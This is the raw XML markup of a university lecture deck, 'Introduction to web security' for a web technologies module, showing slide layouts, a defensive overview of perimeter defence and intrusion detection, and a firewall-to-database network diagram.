        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{20C01F49-F055-1346-88B5-44FE06E298D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lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CD1860D6-2B5F-524E-861E-342EBA923C3B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/1/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AC3454CA-1C8E-3640-B5A8-7A34D2B4B8B0}"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prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099"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prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931863" y="96838"/>
            <a:ext cx="7158037" cy="14128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x-none"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4101" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="1981200"/>
            <a:ext cx="7661275"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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102"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5E851FC2-3531-8A49-8031-162C23645F75}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/1/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4103"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GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4104"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0C2F4568-1E3B-724D-98C2-A6D4136BEB44}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4105"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prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4106"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prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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 id="2147484210" r:id="rId6"/>
    <p:sldLayoutId id="2147484211" r:id="rId7"/>
    <p:sldLayoutId id="2147484212" r:id="rId8"/>
    <p:sldLayoutId id="2147484213" r:id="rId9"/>
    <p:sldLayoutId id="2147484214" r:id="rId10"/>
    <p:sldLayoutId id="2147484215" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="40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Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr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charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr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charset="2"/>
        <a:buChar char="¡"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1293813" indent="-403225" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1681163" indent="-385763" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="¡"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2070100" indent="-387350" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2527300" indent="-387350" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2984500" indent="-387350" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3441700" indent="-387350" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3898900" indent="-387350" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="7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mail.northumbria.ac.uk/owa/auth/logon.aspx?replaceCurrent=1&amp;url=https://mail.northumbria.ac.uk/owa/"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owasp.or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ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/security.ph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0113" y="3886200"/>
            <a:ext cx="7632700" cy="2135188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447675" indent="-447675" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KF4009 Web Technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="447675" indent="-447675" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>2018/19</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Introduction to web security</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">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31863" y="548680"/>
            <a:ext cx="7158037" cy="817017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Making it harder for hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can reduce the likelihood that an attack on your system will be successful by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knowing how attackers carry out attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placing as many roadblocks in their way as you can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perimeter defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder Detection System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219895" y="404664"/>
            <a:ext cx="6808489" cy="745009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Single-layer Perimeter defence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="computr1"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2781300"/>
            <a:ext cx="1079500" cy="1008063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483647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99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="34925" y="3933825"/>
            <a:ext cx="148113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a:t>Internet user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9221" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1804988" y="2482850"/>
            <a:ext cx="9667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a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3203575" y="3141663"/>
            <a:ext cx="1008063" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8199" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="3284538"/>
            <a:ext cx="647700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9224" name="server"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5051425" y="2924175"/>
            <a:ext cx="673100" cy="100965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99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9225" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5003800" y="4005263"/>
            <a:ext cx="8255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a:t>Web </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9226" name="server"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7667625" y="2924175"/>
            <a:ext cx="649288" cy="100965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99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9227" name="TextBox 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7296150" y="4005263"/>
            <a:ext cx="1236663"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a:t>Database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Cloud 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="2924175"/>
            <a:ext cx="1150938" cy="100965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a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="28" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9229" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843213" y="3284538"/>
            <a:ext cx="360362" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9230" name="Flowchart: Magnetic Disk 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8675688" y="2997200"/>
            <a:ext cx="433387" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-GB" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9231" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316913" y="3284538"/>
            <a:ext cx="358775" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9232" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
